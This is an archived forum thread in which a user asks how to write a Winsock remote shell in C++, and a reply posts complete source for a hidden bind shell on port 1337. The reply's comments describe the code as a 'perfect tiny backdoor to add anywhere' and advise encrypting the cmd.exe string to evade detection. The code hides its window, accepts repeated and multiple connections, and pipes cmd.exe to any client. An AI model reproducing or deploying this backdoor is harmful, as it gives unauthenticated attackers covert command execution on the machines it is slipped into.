Sign in to follow this  

Winsock Remote Shell

This topic is 4664 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.

If you intended to correct an error in the post then please contact us.

Recommended Posts

Hi Does anyone know how to make a remote shell in C++ using STARTUPINFO and CreateProcess... I can do it in assembly but it seems a pain to write out so much code... thanx

Share this post


Link to post
Share on other sites
here is some code i made back in my hacking days... enjoy


/*
portSHell.cpp {$}{$}{$}{$}
//some code stolen from 3APA3A
//thanks:)
//m0dified by anonymous


perfect tiny backdoor to add anywhere
only string is cmd.exe (encrypt it)

I have never seen this done before outside of netcat
netcat is too big for our purposes when all we want is this
enjoy :@)

binds a shell to port 1337

[+] 3APA3A provides main code (piping stdin to socket)
[+] I add hide window functionality
[+] I add bind to port
[+] NEW STUFF
[+] you can connect after you disconnect
[+] you can have multiple connections

*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

int WINAPI WinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
WORD version;
WSADATA wsadata;
int err;
version = MAKEWORD(1,1);
err = WSAStartup(version, &wsadata);

SOCKET s = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
SOCKET s2 = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

sockaddr_in sock;
memset(&sock,0,sizeof(sock));
sock.sin_addr.s_addr = INADDR_ANY;
sock.sin_family = AF_INET;
sock.sin_port = htons(1337);
bind(s,(sockaddr*)&sock,sizeof(sock));


/* g0tcha l00k here!!!!!!!!!!!!!!!!!!!!!!
i added the while(1) to keep it looping*/

while(1)
{

listen(s,3);

int size = sizeof(sock);
s2 = accept(s,(sockaddr *)&sock,&size);


/* this is where 3APAPA comes in*/
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s2;
si.wShowWindow = SW_HIDE;
CreateProcess(
NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
0,
0,
NULL,
&si,
&pi
);

/*end 3apapa */
}
return(0);
}

Share this post


Link to post
Share on other sites
Thanx whoever u r... I kno it must sound sus but just trying to have a remote shell so that the game dedicated server can be controlled by a remote admin or player. Anyways thanx

Share this post


Link to post
Share on other sites

This topic is 4664 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.

If you intended to correct an error in the post then please contact us.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this